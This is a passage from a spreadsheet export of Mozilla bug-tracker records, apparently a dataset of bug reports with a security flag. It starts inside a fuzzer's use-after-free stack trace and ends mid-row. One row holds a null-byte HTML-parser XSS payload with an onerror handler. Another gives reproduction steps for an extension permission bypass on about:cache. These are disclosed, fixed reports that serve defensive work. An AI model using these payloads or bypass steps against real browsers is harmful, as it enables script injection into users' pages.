    #14 0x7fa5dc197297 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/fuzzer/dev/src/ipc/glue/MessageChannel.cpp:2007:13
    #15 0x7fa5db08d320 in nsThread::ProcessNextEvent(bool, bool*) /home/fuzzer/dev/src/xpcom/threads/nsThread.cpp:1220:14
    #16 0x7fa5db095fb1 in NS_ProcessNextEvent(nsIThread*, bool) /home/fuzzer/dev/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #17 0x7fa5dc1a102a in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/fuzzer/dev/src/ipc/glue/MessagePump.cpp:302:20
    #18 0x7fa5dc0d42a2 in RunInternal /home/fuzzer/dev/src/ipc/chromium/src/base/message_loop.cc:315:10
    #19 0x7fa5dc0d42a2 in RunHandler /home/fuzzer/dev/src/ipc/chromium/src/base/message_loop.cc:308:3
    #20 0x7fa5dc0d42a2 in MessageLoop::Run() /home/fuzzer/dev/src/ipc/chromium/src/base/message_loop.cc:290:3
    #21 0x7fa5db087b51 in nsThread::ThreadFunc(void*) /home/fuzzer/dev/src/xpcom/threads/nsThread.cpp:464:10
    #22 0x7fa5f05ef2e8 in _pt_root /home/fuzzer/dev/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #23 0x7fa5f3f05668 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9668)
    #24 0x7fa5f3ac3322 in clone /build/glibc-4WA41p/glibc-2.30/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
0x60800081a3a8 is located 8 bytes inside of 96-byte region [0x60800081a3a0,0x60800081a400)
freed by thread T23 (IPDL Background) here:
    #0 0x561c133c195d in free (/home/fuzzer/dev/firefox/dist/bin/firefox+0xb895d)
    #1 0x7fa5dc12ce3b in mozilla::ipc::BackgroundParentImpl::DeallocPCacheStreamControlParent(mozilla::dom::cache::PCacheStreamControlParent*) /home/fuzzer/dev/src/ipc/glue/BackgroundParentImpl.cpp:956:3
    #2 0x7fa5dc1a536f in mozilla::ipc::ActorLifecycleProxy::~ActorLifecycleProxy() /home/fuzzer/dev/src/ipc/glue/ProtocolUtils.cpp:253:11
    #3 0x7fa5dca48f7a in mozilla::ipc::PBackgroundParent::RemoveManagee(int, mozilla::ipc::IProtocol*) /home/fuzzer/dev/firefox/ipc/ipdl/PBackgroundParent.cpp
    #4 0x7fa5dcb48f18 in mozilla::dom::cache::PCacheStreamControlParent::Send__delete__(mozilla::dom::cache::PCacheStreamControlParent*) /home/fuzzer/dev/firefox/ipc/ipdl/PCacheStreamControlParent.cpp:125:10
    #5 0x7fa5e0c271f3 in NoteClosed /home/fuzzer/dev/src/dom/cache/StreamControl.cpp:29:3
    #6 0x7fa5e0c271f3 in NoteClosedOnOwningThread /home/fuzzer/dev/src/dom/cache/ReadStream.cpp:399:13
    #7 0x7fa5e0c271f3 in mozilla::dom::cache::ReadStream::Inner::NoteClosed() /home/fuzzer/dev/src/dom/cache/ReadStream.cpp:363:5
    #8 0x7fa5e0c29f10 in mozilla::dom::cache::StreamControl::CloseAllReadStreams() /home/fuzzer/dev/src/dom/cache/StreamControl.cpp:63:21
    #9 0x7fa5e0be07b1 in NotifyCloseAll /home/fuzzer/dev/src/dom/cache/CacheStreamControlParent.cpp:163:3
    #10 0x7fa5e0be07b1 in mozilla::dom::cache::CacheStreamControlParent::CloseAll() /home/fuzzer/dev/src/dom/cache/CacheStreamControlParent.cpp:143:3
    #11 0x7fa5e0be61f2 in mozilla::dom::cache::Context::CancelAll() /home/fuzzer/dev/src/dom/cache/Context.cpp:819:23
    #12 0x7fa5e0c1c78d in Abort /home/fuzzer/dev/src/dom/cache/Manager.cpp:1930:12
    #13 0x7fa5e0c1c78d in mozilla::dom::cache::Manager::Factory::Abort(nsTSubstring&lt;char&gt; const&amp;) /home/fuzzer/dev/src/dom/cache/Manager.cpp:292:20
    #14 0x7fa5e236f38c in mozilla::dom::quota::QuotaManager::OpenDirectoryInternal(mozilla::dom::Nullable&lt;mozilla::dom::quota::PersistenceType&gt; const&amp;, mozilla::dom::quota::OriginScope const&amp;, mozilla::dom::Nullable&lt;mozilla::dom::quota::Client::Type&gt; const&amp;, bool, mozilla::dom::quota::OpenDirectoryListener*) /home/fuzzer/dev/src/dom/quota/ActorsParent.cpp:6705:25
    #15 0x7fa5e2393047 in mozilla::dom::quota::(anonymous namespace)::OriginOperationBase::Run() /home/fuzzer/dev/src/dom/quota/ActorsParent.cpp
    #16 0x7fa5e239c251 in RunImmediately /home/fuzzer/dev/src/dom/quota/ActorsParent.cpp:1260:5
    #17 0x7fa5e239c251 in mozilla::dom::quota::(anonymous namespace)::Quota::RecvPQuotaRequestConstructor(mozilla::dom::quota::PQuotaRequestParent*, mozilla::dom::quota::RequestParams const&amp;) /home/fuzzer/dev/src/dom/quota/ActorsParent.cpp:8765:7
    #18 0x7fa5dc788d12 in mozilla::dom::quota::PQuotaParent::OnMessageReceived(IPC::Message const&amp;) /home/fuzzer/dev/firefox/ipc/ipdl/PQuotaParent.cpp:350:28
    #19 0x7fa5dca4bb21 in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /home/fuzzer/dev/firefox/ipc/ipdl/PBackgroundParent.cpp:3522:32
    #20 0x7fa5dc198c26 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /home/fuzzer/dev/src/ipc/glue/MessageChannel.cpp:2215:25
    #21 0x7fa5dc195413 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/fuzzer/dev/src/ipc/glue/MessageChannel.cpp:2137:9
    #22 0x7fa5dc196cd9 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/fuzzer/dev/src/ipc/glue/MessageChannel.cpp:1976:3
    #23 0x7fa5dc197297 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/fuzzer/dev/src/ipc/glue/MessageChannel.cpp:2007:13
    #24 0x7fa5db08d320 in nsThread::ProcessNextEvent(bool, bool*) /home/fuzzer/dev/src/xpcom/threads/nsThread.cpp:1220:14
    #25 0x7fa5db095fb1 in NS_ProcessNextEvent(nsIThread*, bool) /home/fuzzer/dev/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #26 0x7fa5dc1a102a in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/fuzzer/dev/src/ipc/glue/MessagePump.cpp:302:20
    #27 0x7fa5dc0d42a2 in RunInternal /home/fuzzer/dev/src/ipc/chromium/src/base/message_loop.cc:315:10
    #28 0x7fa5dc0d42a2 in RunHandler /home/fuzzer/dev/src/ipc/chromium/src/base/message_loop.cc:308:3
    #29 0x7fa5dc0d42a2 in MessageLoop::Run() /home/fuzzer/dev/src/ipc/chromium/src/base/message_loop.cc:290:3
    #30 0x7fa5db087b51 in nsThread::ThreadFunc(void*) /home/fuzzer/dev/src/xpcom/threads/nsThread.cpp:464:10
    #31 0x7fa5f05ef2e8 in _pt_root /home/fuzzer/dev/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #32 0x7fa5f3f05668 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9668)
previously allocated by thread T23 (IPDL Background) here:
    #0 0x561c133c1bdd in malloc (/home/fuzzer/dev/firefox/dist/bin/firefox+0xb8bdd)
    #1 0x561c133f6e8d in moz_xmalloc /home/fuzzer/dev/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7fa5e0bc5c90 in operator new /home/fuzzer/dev/firefox/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7fa5e0bc5c90 in mozilla::dom::cache::AutoParentOpResult::SerializeReadStream(nsID const&amp;, mozilla::dom::cache::StreamList*, mozilla::dom::cache::CacheReadStream*) /home/fuzzer/dev/src/dom/cache/AutoUtils.cpp:497:13
    #4 0x7fa5e0bc507b in mozilla::dom::cache::AutoParentOpResult::SerializeResponseBody(mozilla::dom::cache::SavedResponse const&amp;, mozilla::dom::cache::StreamList*, mozilla::dom::cache::CacheResponse*) /home/fuzzer/dev/src/dom/cache/AutoUtils.cpp:481:3
    #5 0x7fa5e0bd56f0 in mozilla::dom::cache::CacheOpParent::OnOpComplete(mozilla::ErrorResult&amp;&amp;, mozilla::dom::cache::CacheOpResult const&amp;, long, nsTArray&lt;mozilla::dom::cache::SavedResponse&gt; const&amp;, nsTArray&lt;mozilla::dom::cache::SavedRequest&gt; const&amp;, mozilla::dom::cache::StreamList*) /home/fuzzer/dev/src/dom/cache/CacheOpParent.cpp:174:12
    #6 0x7fa5e0c1ab93 in mozilla::dom::cache::Manager::Listener::OnOpComplete(mozilla::ErrorResult&amp;&amp;, mozilla::dom::cache::CacheOpResult const&amp;, mozilla::dom::cache::SavedResponse const&amp;, mozilla::dom::cache::StreamList*) /home/fuzzer/dev/src/dom/cache/Manager.cpp:1497:3
    #7 0x7fa5e0c3903b in mozilla::dom::cache::Manager::CacheMatchAction::Complete(mozilla::dom::cache::Manager::Listener*, mozilla::ErrorResult&amp;&amp;) /home/fuzzer/dev/src/dom/cache/Manager.cpp:557:18
    #8 0x7fa5e0c385c2 in mozilla::dom::cache::Manager::BaseAction::CompleteOnInitiatingThread(nsresult) /home/fuzzer/dev/src/dom/cache/Manager.cpp:436:7
    #9 0x7fa5e0be45f1 in mozilla::dom::cache::Context::ActionRunnable::Run() /home/fuzzer/dev/src/dom/cache/Context.cpp:650:16
    #10 0x7fa5db08d320 in nsThread::ProcessNextEvent(bool, bool*) /home/fuzzer/dev/src/xpcom/threads/nsThread.cpp:1220:14
    #11 0x7fa5db095fb1 in NS_ProcessNextEvent(nsIThread*, bool) /home/fuzzer/dev/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #12 0x7fa5dc1a1173 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/fuzzer/dev/src/ipc/glue/MessagePump.cpp:332:5
    #13 0x7fa5dc0d42a2 in RunInternal /home/fuzzer/dev/src/ipc/chromium/src/base/message_loop.cc:315:10
    #14 0x7fa5dc0d42a2 in RunHandler /home/fuzzer/dev/src/ipc/chromium/src/base/message_loop.cc:308:3
    #15 0x7fa5dc0d42a2 in MessageLoop::Run() /home/fuzzer/dev/src/ipc/chromium/src/base/message_loop.cc:290:3
    #16 0x7fa5db087b51 in nsThread::ThreadFunc(void*) /home/fuzzer/dev/src/xpcom/threads/nsThread.cpp:464:10
    #17 0x7fa5f05ef2e8 in _pt_root /home/fuzzer/dev/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #18 0x7fa5f3f05668 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9668)
Thread T23 (IPDL Background) created by T0 here:
    #0 0x561c133ac36a in pthread_create (/home/fuzzer/dev/firefox/dist/bin/firefox+0xa336a)
    #1 0x7fa5f05dd6d3 in _PR_CreateThread /home/fuzzer/dev/src/nsprpub/pr/src/pthreads/ptthread.c:458:14
    #2 0x7fa5f05c770e in PR_CreateThread /home/fuzzer/dev/src/nsprpub/pr/src/pthreads/ptthread.c:533:12
    #3 0x7fa5db089e52 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /home/fuzzer/dev/src/xpcom/threads/nsThread.cpp:670:8
    #4 0x7fa5db0951b1 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /home/fuzzer/dev/src/xpcom/threads/nsThreadManager.cpp:621:12
    #5 0x7fa5db09</t>
        </is>
      </c>
      <c r="X1546" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1547">
      <c r="A1547" t="n">
        <v>517598</v>
      </c>
      <c r="B1547" t="inlineStr">
        <is>
          <t>2009-09-18 16:04:05 -0700</t>
        </is>
      </c>
      <c r="C1547" t="inlineStr">
        <is>
          <t>Put useful interestingness/index values for bookmarks/history/etc.</t>
        </is>
      </c>
      <c r="D1547" t="inlineStr">
        <is>
          <t>2018-09-24 14:24:50 -0700</t>
        </is>
      </c>
      <c r="E1547" t="n">
        <v>1</v>
      </c>
      <c r="F1547" t="n">
        <v>1</v>
      </c>
      <c r="G1547" t="n">
        <v>2</v>
      </c>
      <c r="H1547" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1547" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1547" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K1547" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1547" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1547" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1547" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1547" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1547" t="inlineStr"/>
      <c r="Q1547" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1547" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1547" t="inlineStr">
        <is>
          <t>0.8</t>
        </is>
      </c>
      <c r="T1547" t="n">
        <v>1</v>
      </c>
      <c r="U1547" t="n">
        <v>0</v>
      </c>
      <c r="V1547" t="n">
        <v>3</v>
      </c>
      <c r="W1547" t="inlineStr">
        <is>
          <t>With partial download bug 507429, Weave pulls in chunks, but the index values are all 0, so they come back in some order..</t>
        </is>
      </c>
      <c r="X1547" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1548">
      <c r="A1548" t="n">
        <v>1421273</v>
      </c>
      <c r="B1548" t="inlineStr">
        <is>
          <t>2017-11-28 06:31:36 -0800</t>
        </is>
      </c>
      <c r="C1548" t="inlineStr">
        <is>
          <t>Show count of jobs classified as "fixed by commit" for push</t>
        </is>
      </c>
      <c r="D1548" t="inlineStr">
        <is>
          <t>2019-10-24 21:09:02 -0700</t>
        </is>
      </c>
      <c r="E1548" t="n">
        <v>1</v>
      </c>
      <c r="F1548" t="n">
        <v>1</v>
      </c>
      <c r="G1548" t="n">
        <v>7</v>
      </c>
      <c r="H1548" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1548" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1548" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K1548" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1548" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1548" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1548" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1548" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1548" t="inlineStr">
        <is>
          <t>[lang=js]</t>
        </is>
      </c>
      <c r="Q1548" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1548" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1548" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1548" t="n">
        <v>1</v>
      </c>
      <c r="U1548" t="n">
        <v>0</v>
      </c>
      <c r="V1548" t="n">
        <v>12</v>
      </c>
      <c r="W1548" t="inlineStr">
        <is>
          <t>When a sheriff looks for merge candidates, they have to check if a push contains a regression by looking for failure in that push marked with "fixed by commit". At the moment, this can be done by clicking on the filter button and selecting both "failure classification" and "fixed by commit" and clicking on "add".
It should be a number instead of a binary information because it is a hint for a person who classifies still unstarred jobs if it's likely that a failure is yet another occurrence of a regression which got fixed by a backout.</t>
        </is>
      </c>
      <c r="X1548" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1549">
      <c r="A1549" t="n">
        <v>1584216</v>
      </c>
      <c r="B1549" t="inlineStr">
        <is>
          <t>2019-09-26 07:21:43 -0700</t>
        </is>
      </c>
      <c r="C1549" t="inlineStr">
        <is>
          <t>Handle zero bytes after &lt;!- and &amp; correctly</t>
        </is>
      </c>
      <c r="D1549" t="inlineStr">
        <is>
          <t>2020-01-16 13:53:26 -0800</t>
        </is>
      </c>
      <c r="E1549" t="n">
        <v>1</v>
      </c>
      <c r="F1549" t="n">
        <v>1</v>
      </c>
      <c r="G1549" t="n">
        <v>3</v>
      </c>
      <c r="H1549" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1549" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1549" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K1549" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1549" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1549" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1549" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1549" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1549" t="inlineStr">
        <is>
          <t>[adv-main70+][adv-esr68.2+][post-critsmash-triage], [wptsync upstream]</t>
        </is>
      </c>
      <c r="Q1549" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1549" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1549" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T1549" t="n">
        <v>1</v>
      </c>
      <c r="U1549" t="n">
        <v>0</v>
      </c>
      <c r="V1549" t="n">
        <v>31</v>
      </c>
      <c r="W1549" t="inlineStr">
        <is>
          <t>This just got dropped in a conference:
```
&lt;!-[x00][x00][x00][x00][x00]- &gt;&lt;div title="--&gt;&lt;img src=1 onerror=alert(1)&gt;"&gt;&lt;/div&gt;
```</t>
        </is>
      </c>
      <c r="X1549" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1550">
      <c r="A1550" t="n">
        <v>1366056</v>
      </c>
      <c r="B1550" t="inlineStr">
        <is>
          <t>2017-05-18 13:31:18 -0700</t>
        </is>
      </c>
      <c r="C1550" t="inlineStr">
        <is>
          <t>showing v57 tourset for new user tour and update user tour</t>
        </is>
      </c>
      <c r="D1550" t="inlineStr">
        <is>
          <t>2017-10-13 08:45:46 -0700</t>
        </is>
      </c>
      <c r="E1550" t="n">
        <v>1</v>
      </c>
      <c r="F1550" t="n">
        <v>1</v>
      </c>
      <c r="G1550" t="n">
        <v>2</v>
      </c>
      <c r="H1550" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1550" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1550" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1550" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1550" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1550" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1550" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1550" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1550" t="inlineStr">
        <is>
          <t xml:space="preserve"> [photon-onboarding]</t>
        </is>
      </c>
      <c r="Q1550" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1550" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1550" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T1550" t="n">
        <v>1</v>
      </c>
      <c r="U1550" t="n">
        <v>0</v>
      </c>
      <c r="V1550" t="n">
        <v>30</v>
      </c>
      <c r="W1550" t="inlineStr">
        <is>
          <t>Logic to give Tour Overlay with "what's new with photon" content instead of new user content to all existing users to showcase new photon features.</t>
        </is>
      </c>
      <c r="X1550" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1551">
      <c r="A1551" t="n">
        <v>1431371</v>
      </c>
      <c r="B1551" t="inlineStr">
        <is>
          <t>2018-01-18 03:35:55 -0800</t>
        </is>
      </c>
      <c r="C1551" t="inlineStr">
        <is>
          <t>activeTab permission allows executing scripts on pages it shouldn't</t>
        </is>
      </c>
      <c r="D1551" t="inlineStr">
        <is>
          <t>2024-05-30 09:41:59 -0700</t>
        </is>
      </c>
      <c r="E1551" t="n">
        <v>1</v>
      </c>
      <c r="F1551" t="n">
        <v>1</v>
      </c>
      <c r="G1551" t="n">
        <v>3</v>
      </c>
      <c r="H1551" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1551" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J1551" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1551" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L1551" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1551" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1551" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1551" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1551" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main59+]</t>
        </is>
      </c>
      <c r="Q1551" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1551" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1551" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T1551" t="n">
        <v>1</v>
      </c>
      <c r="U1551" t="n">
        <v>0</v>
      </c>
      <c r="V1551" t="n">
        <v>19</v>
      </c>
      <c r="W1551" t="inlineStr">
        <is>
          <t>Created attachment 8943569
POC.zip
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Steps to reproduce:
-----Originally reported in bug 1429881#c2-------
browser.tabs.executeScript is blocked from running in 'about:cache' IFF coming from extensions normal background script. However, I noticed that the same is not true if executeScript is called from a browserAction popup script.
1. Install attached PoC extension
2. Navigate to 'about:cache' (or just a new tab/home)
3. Click on browser action button (top right green widget)
According to https://developer.mozilla.org/en-US/Add-ons/WebExtensions/API/tabs/executeScript 
"You can only inject code into pages whose URL can be expressed using a match pattern: meaning, its scheme must be one of "http", "https", "file", "ftp""
Though there is clearly an exception somewhere for browserAction popup scripts.
Actual results:
We can execute script on 'about:cache' as well as other extension pages. Scripts are _not_ executed on privileged pages. (such as about:addons)
Expected results:
Both instances should be blocked</t>
        </is>
      </c>
      <c r="X1551" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1552">
      <c r="A1552" t="n">
        <v>1752396</v>
      </c>
      <c r="B1552" t="inlineStr">
        <is>
          <t>2022-01-27 11:20:29 -0800</t>
        </is>
      </c>
      <c r="C1552" t="inlineStr">
        <is>
          <t>Temporary file creation moved from /tmp/mozilla_${USER}0 to /tmp. Potential security risk</t>
        </is>
      </c>
      <c r="D1552" t="inlineStr">
        <is>
          <t>2022-08-27 22:41:41 -0700</t>
        </is>
      </c>
      <c r="E1552" t="n">
        <v>1</v>
      </c>
      <c r="F1552" t="n">
        <v>1</v>
      </c>
      <c r="G1552" t="n">
        <v>2</v>
      </c>
      <c r="H1552" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1552" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1552" t="inlineStr">
        <is>
          <t>Downloads Panel</t>
        </is>
      </c>
      <c r="K1552" t="inlineStr">
        <is>
          <t>Firefox 91</t>
        </is>
      </c>
      <c r="L1552" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1552" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1552" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1552" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1552" t="inlineStr">
        <is>
          <t>[adv-esr91.7+]</t>
        </is>
      </c>
      <c r="Q1552" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1552" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1552" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1552" t="n">
        <v>1</v>
      </c>
      <c r="U1552" t="n">
        <v>0</v>
      </c>
      <c r="V1552" t="n">
        <v>12</v>
      </c>
      <c r="W1552" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Steps to reproduce:
Firefox used to create a folder /tmp/mozilla_${USER}0 where it stored all temporary files (mostly downloads for display). Somewhen between 78 and 91 this was abolished and now all downloaded files end up in /tmp/.
This is a potential security risk!
/tmp/mozilla_${USER}0 was 0700, i.e. nobody but the $USER could create files in it. Now, with files being created in /tmp, an attacker can not only guess a filename but, by monitoring web traffic, actually knows what file is created next. This is a variant of the insecure temporary file creation attack, where the attacker doesn't even has to guess.
Actual results:
Downloaded temporary files end up in /tmp
Expected results:
Downloaded temporary files should not end up in /tmp/but in a sub-directory that is owned by the user and write protected for everyone else.</t>
        </is>
      </c>
      <c r="X1552" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1553">
      <c r="A1553" t="n">
        <v>1107011</v>
      </c>
      <c r="B1553" t="inlineStr">
        <is>
          <t>2014-12-03 00:51:52 -0800</t>
        </is>
      </c>
      <c r="C1553" t="inlineStr">
        <is>
          <t>Crash in js::jit::LiveInterval::addRangeAtHead</t>
        </is>
      </c>
      <c r="D1553" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:33 -0700</t>
        </is>
      </c>
      <c r="E1553" t="n">
        <v>1</v>
      </c>
      <c r="F1553" t="n">
        <v>1</v>
      </c>
      <c r="G1553" t="n">
        <v>3</v>
      </c>
      <c r="H1553" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1553" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1553" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1553" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1553" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1553" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1553" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1553" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1553" t="inlineStr">
        <is>
          <t>[adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q1553" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1553" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1553" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T1553" t="n">
        <v>1</v>
      </c>
      <c r="U1553" t="n">
        <v>1</v>
      </c>
      <c r="V1553" t="n">
        <v>51</v>
      </c>
      <c r="W1553" t="inlineStr">
        <is>
          <t>I've gotten a bunch of crashes recently in js::jit::LiveInterval::addRangeAtHead.  Some incident IDs:
https://crash-stats.mozilla.com/report/index/bp-c1a67bdb-860e-462d-a4f3-36e082141130
https://crash-stats.mozilla.com/report/index/bp-a19d5109-b548-4601-9e12-8cf772141130
https://crash-stats.mozilla.com/report/index/bp-f3edc6f9-14d1-47d2-8beb-941842141203
https://crash-stats.mozilla.com/report/index/bp-0f4bf5de-5438-4080-8eac-965c42141203
I _think_ the last two of those were on http://theconversation.com/the-rape-scene-in-brad-pitts-fury-no-one-is-talking-about-33638 when scrolling down the page.
All of these look like null derefs to me (crash at address 0x20).</t>
        </is>
      </c>
      <c r="X1553" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1554">
      <c r="A1554" t="n">
        <v>668941</v>
      </c>
      <c r="B1554" t="inlineStr">
        <is>
          <t>2011-07-01 19:30:30 -0700</t>
        </is>
      </c>
      <c r="C1554" t="inlineStr">
        <is>
          <t>"ASSERTION: frame crosses fixed continuation boundary" with rtl, pre-wrap, :first-letter</t>
        </is>
      </c>
      <c r="D1554" t="inlineStr">
        <is>
          <t>2013-12-27 14:29:15 -0800</t>
        </is>
      </c>
      <c r="E1554" t="n">
        <v>1</v>
      </c>
      <c r="F1554" t="n">
        <v>1</v>
      </c>
      <c r="G1554" t="n">
        <v>3</v>
      </c>
      <c r="H1554" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1554" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1554" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K1554" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1554" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1554" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1554" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
